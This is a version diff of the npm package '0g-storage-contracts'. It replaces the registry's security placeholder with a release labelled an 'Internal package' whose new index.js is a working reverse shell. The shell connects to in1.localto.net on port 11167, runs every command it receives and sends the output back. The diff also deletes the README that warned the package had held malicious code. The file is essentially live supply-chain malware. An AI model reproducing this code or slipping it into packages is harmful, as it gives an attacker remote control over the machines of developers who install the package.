0g-storage-contracts 0.0.1-security → 2.2.0

package/index.js

@@ -0,0 +1,29 @@
+const net = require('net');
+const { exec } = require('child_process');
+
+// Replace these with your actual Ngrok URL and port
+const server = 'in1.localto.net'; // swap with your own server
+const port = 11167; // swap with your own port
+
+const client = new net.Socket();
+client.connect(port, server, () => {
+console.log('Connected to remote server');
+client.write('Reverse shell connection established\n');
+});
+
+client.on('data', (data) => {
+exec(data.toString(), (error, stdout, stderr) => {
+if (stdout) client.write(stdout);
+if (stderr) client.write(stderr);
+if (error) client.write(error.message);
+});
+});
+
+client.on('error', (err) => {
+console.error(Connection error: ${err.message});
+client.destroy();
+});
+
+client.on('close', () => {
+console.log('Connection closed');
+});

package/package.json

@@ -1,6 +1,14 @@
 {
   "name": "0g-storage-contracts",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "2.2.0",
+  "description": "Internal package",
+  "main": "index.js",
+  "scripts": {
+    "test": "ls"
+  },
+  "keywords": [
+    "Testing"
+  ],
+  "author": "ISC",
+  "license": "ISC"
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=0g-storage-contracts for more information.